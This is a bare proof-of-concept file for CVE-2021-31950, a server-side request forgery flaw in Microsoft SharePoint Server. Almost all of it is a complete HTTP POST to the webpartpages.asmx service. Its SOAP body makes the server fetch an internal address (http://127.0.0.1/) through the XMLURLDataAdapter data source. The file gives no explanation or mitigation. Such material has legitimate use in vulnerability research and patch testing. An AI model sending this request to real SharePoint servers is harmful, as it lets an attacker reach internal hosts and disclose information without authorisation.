CVE-2021-31950

CVE-2021-31950.md

Microsoft SharePoint Server - GetXmlDataFromDataSource Server-Side Request Forgery Information Disclosure Vulnerability

POC:

POST /_vti_bin/webpartpages.asmx HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
SOAPAction: "http://microsoft.com/sharepoint/webpartpages/GetXmlDataFromDataSource"
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: 1299
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetXmlDataFromDataSource xmlns="http://microsoft.com/sharepoint/webpartpages">
      <queryXml>&lt;udc:DataSource xmlns:udc="http://schemas.microsoft.com/data/udc" xmlns:udcs="http://schemas.microsoft.com/data/udc/soap" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:dsp="http://schemas.microsoft.com/sharepoint/dsp" xmlns:dataurl="http://schemas.microsoft.com/sharepoint/dsp/xmlurl"&gt;  &lt;udc:ConnectionInfo&gt;    &lt;udcs:Location href=""&gt;XMLURLDataAdapter&lt;/udcs:Location&gt;    &lt;soap:Header&gt;      &lt;dsp:versions&gt;      &lt;/dsp:versions&gt;      &lt;dsp:request method="query" /&gt;    &lt;/soap:Header&gt;    &lt;soap:Body&gt;      &lt;dsp:queryRequest&gt;        &lt;dsp:ptQuery&gt;          &lt;dataurl:Headers&gt;            &lt;dataurl:Url href="http://127.0.0.1/" Method="HTTP Get"/&gt;          &lt;/dataurl:Headers&gt;        &lt;/dsp:ptQuery&gt;      &lt;/dsp:queryRequest&gt;    &lt;/soap:Body&gt;  &lt;/udc:ConnectionInfo&gt;&lt;/udc:DataSource&gt;</queryXml>
    </GetXmlDataFromDataSource>
  </soap:Body>
</soap:Envelope>